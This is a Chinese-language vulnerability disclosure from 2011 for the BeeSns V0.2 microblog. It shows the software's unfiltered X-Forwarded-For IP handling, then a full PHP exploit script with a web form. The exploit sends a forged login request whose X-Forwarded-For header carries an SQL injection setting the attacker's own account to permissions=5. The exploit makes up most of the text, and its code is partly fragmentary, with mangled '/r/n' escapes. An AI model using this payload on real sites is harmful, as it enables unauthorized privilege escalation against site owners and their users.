发布日期:2011-1.27
发布作者:子仪
影响版本:BeeSns V0.2
官方地址: http://www.beesns.com/
漏洞描述:IP过滤不严,导致用户可以提交恶意参数提升自身权限
这套微博系统风格挺不错的,个人比较喜欢,看代码是发现一些问题,直接看代码吧
04 | if(isset($_SERVER[HTTP_X_FORWARDED_FOR])) { |
05 | $realip= $_SERVER[HTTP_X_FORWARDED_FOR]; |
06 | } elseif(isset($_SERVER[HTTP_CLIENT_IP])) { |
07 | $realip= $_SERVER[HTTP_CLIENT_IP]; |
09 | $realip= $_SERVER[REMOTE_ADDR]; |
12 | if(getenv("HTTP_X_FORWARDED_FOR")) { |
13 | $realip= getenv( "HTTP_X_FORWARDED_FOR"); |
14 | } elseif(getenv("HTTP_CLIENT_IP")) { |
15 | $realip= getenv("HTTP_CLIENT_IP"); |
17 | $realip= getenv("REMOTE_ADDR"); |
20 | $iphide=explode(".",$realip); |
22 | $realip="$iphide[0].$iphide[1].$iphide[2].$iphide[3]";//!我不明白作者写的神马东西,IP没过滤,漏洞产生 |
老掉牙的漏洞了,纯属YY。 - -!
EXP:
03 | +---------------------------------------------------------------------------+<br> |
04 | BeeSns v0.2 Getip() Remote SQL Injection Exploit<br> |
05 | site:www.beesns.com <br> |
07 | Blog: http://www.zyday.com <br> |
09 | +---------------------------------------------------------------------------+<br>'); |
11 | if(empty($_POST[submit])) { |
14 | ini_set('max_execution_time', 0); |
17 | $username= $_POST[username]; |
18 | $password= $_POST[password]; |
25 | global$host, $path,$username,$password; |
27 | $cmd= "uId=".$username."&uPw=".$password; |
28 | $getinj="1.1.1.1',permissions=5 where uid='$username'#"; |
29 | $data= "POST ".$path."post.php?act=userLogin HTTP/1.1/r/n"; |
30 | $data.= "Accept: */*/r/n"; |
31 | $data.= "Accept-Language: zh-cn/r/n"; |
32 | $data.= "Content-Type: application/x-www-form-urlencoded/r/n"; |
33 | $data.= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)/r/n"; |
34 | $data.= "Host: $host/r/n"; |
35 | $data.= "Content-Length: ".strlen($cmd)."/r/n"; |
36 | $data.= "Connection: Close/r/n"; |
37 | $data.= "X-Forwarded-For: $getinj/r/n/r/n"; |
40 | $fp= fsockopen($host, 80); |
45 | while($fp&& !feof($fp)) |
46 | $resp.= fread($fp, 1024); |
48 | if(preg_match('#(.*)charset=utf-8(.*)1(.*)1(.*)0(.*)#Uis',$resp)){ |
49 | echo"<br><font color='green'>提升权限成功!</font>"; |
51 | echo"<font color='red'>Failed!</font>"; |
56 | <form action=''method='POST'> |
58 | 二级目录:<input type='input'name='path'value='/'>*如果不是二级目录,请保持默认<br> |
59 | 用户名:<input type='input'name='username'>*您在目标站申请的用户名,<font color='red'>建议用小号测试</font><br> |
60 | 密码:<input type='input'name='password'><br> |
61 | <input type='submit'name='submit'value='提升权限'><br> |